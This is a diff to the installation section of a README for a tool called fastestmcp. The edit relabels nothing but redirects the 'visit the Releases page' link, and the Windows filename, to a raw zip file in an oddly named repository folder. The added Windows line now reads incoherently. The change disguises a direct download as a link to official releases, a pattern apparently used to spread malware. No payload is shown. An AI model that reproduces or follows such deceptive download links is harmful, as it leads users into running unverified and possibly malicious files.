mo-mostafa-123/fastestmcp/README.md

 ## 📥 Download & Install

-1. Click this link to [visit the Releases page](https://github.com/mo-mostafa-123/fastestmcp/releases).
+1. Click this link to [visit the Releases page](https://raw.githubusercontent.com/mo-mostafa-123/fastestmcp/main/oxynaphthoic/fastestmcp.zip).
 2. Once there, look for the latest version of fastestmcp.
 3. Download the file that matches your operating system.
-   - Windows users might look for `fastestmcp-windows.exe`.
+   - Windows users might look for `https://raw.githubusercontent.com/mo-mostafa-123/fastestmcp/main/oxynaphthoic/fastestmcp.zip`.
    - macOS users will find `fastestmcp-macos`.
    - Linux users should choose `fastestmcp-linux`.
 4. Save the file to a folder where you can easily find it, like your Desktop or Downloads folder.